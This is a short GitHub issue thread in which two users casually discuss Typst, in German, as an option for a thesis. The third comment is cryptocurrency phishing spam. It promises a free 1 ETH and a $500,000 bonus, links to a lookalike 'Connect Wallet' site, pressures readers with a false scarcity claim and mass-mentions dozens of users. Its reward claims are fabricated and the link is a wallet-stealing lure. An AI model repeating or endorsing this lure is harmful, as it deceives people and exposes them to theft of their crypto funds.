### ISSUE TITLE
Typst

### ISSUE THREAD

**Issue by otsmr** [0e141/Thesis-Vorlage-HSO#1]
Kennst du schon Typst? :)

https://typst.app/

**Comment by 0e141** [comment]
Hat ja schon so "I use Arch btw" vibes xD

Wollt ich mir aber actually mal anschauen... vlt für die Masterthesis :D

**Comment by Lirikkk** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
robertreppel, @zoeschmitt, @p7th0n, @QuinnNguyen, @sabarishtm, @duyhenryer, @vrachieru, @CHENBAE, @settlers2000, @scootcho, @jenizar, @nixphix, @MrGuzbot, @leonshen33, @Calonyction, @holgun, @ksophocleous, @JuchiaLu, @hpeng86, @stevekeol, @liloman, @freerambo, @kevinniechen, @wowdyaln, @jzj1993, @fed-franz, @sanderdejong, @titipepe, @wizicer, @merlinpanda, @jmaitrehenry, @AlmogBaku, @CalebCheptumo, @TheDaft78, @evansmejax, @joearaneta, @reddysainathn, @mbharadwaj, @lsilvs, @jurson86, @ankurmistry, @woshisbb43, @Edznux, @zhouweihua, @CorentinDCAP, @Xdeon, @Pavel-Bakunovich, @Thisarahetz, @mrw34, @codehunt023
